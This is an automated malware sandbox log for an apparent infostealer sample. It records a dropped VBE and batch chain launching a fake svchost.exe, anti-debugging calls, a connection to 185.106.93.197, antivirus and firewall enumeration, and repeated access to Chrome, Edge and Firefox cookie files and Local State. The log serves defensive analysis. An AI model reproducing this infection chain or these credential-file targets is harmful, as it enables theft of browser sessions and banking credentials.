Source: NWrxbOzSkS.14.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: NWrxbOzSkS.14.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: NWrxbOzSkS.14.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: NWrxbOzSkS.14.dr Binary or memory string: tasks.office.comVMware20,11696492231o
Source: NWrxbOzSkS.14.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: NWrxbOzSkS.14.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: NWrxbOzSkS.14.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: NWrxbOzSkS.14.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: NWrxbOzSkS.14.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: NWrxbOzSkS.14.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe API call chain: ExitProcess graph end node
Source: C:\comref\svchost.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_002FF838
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_00307DEE mov eax, dword ptr fs:[00000030h] 0_2_00307DEE
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_0030C030 GetProcessHeap, 0_2_0030C030
Source: C:\comref\svchost.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_002FF838
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FF9D5 SetUnhandledExceptionFilter, 0_2_002FF9D5
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_002FFBCA
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_00308EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00308EBD
Source: C:\comref\svchost.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\comref\svchost.exe Network Connect: 185.106.93.197 80 Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\comref\POAHIjOuJ41OH.vbe" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\comref\dbCG2LHUCV1kAJJ.bat" " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\comref\svchost.exe "C:\comref/svchost.exe" Jump to behavior
Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006FCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managerosof
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FF654 cpuid 0_2_002FF654
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_002FAF0F
Source: C:\comref\svchost.exe Queries volume information: C:\comref\svchost.exe VolumeInformation Jump to behavior
Source: C:\comref\svchost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\comref\svchost.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002FDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_002FDF1E
Source: C:\Users\user\Desktop\ugRGgCJhQl.exe Code function: 0_2_002EB146 GetVersionExW, 0_2_002EB146
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: svchost.exe, 0000000E.00000002.3698250628.0000000002E74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000043FC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000056AF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000033BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000539C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000383A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004877000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000033BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000383A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000043FC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: eC:/Users/All Users\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000002E74000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000383A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.000000000383A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: TC:/Users/All Users\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000004A9C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.00000000046BF000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vC:/Users/All Users\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe
Source: svchost.exe, 0000000E.00000002.3698250628.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:/Users/All Users\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exe
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\comref\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

barindex
Source: Yara match File source: 0000000E.00000002.3783847798.0000000012AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchost.exe PID: 4340, type: MEMORYSTR
Source: Yara match File source: ugRGgCJhQl.exe, type: SAMPLE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.svchost.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000000.1292145325.0000000000232000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1235344386.00000000069A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1234987945.0000000006090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\comref\svchost.exe, type: DROPPED
Source: Yara match File source: ugRGgCJhQl.exe, type: SAMPLE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.svchost.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\comref\svchost.exe, type: DROPPED
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
Source: C:\comref\svchost.exe File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal Jump to behavior
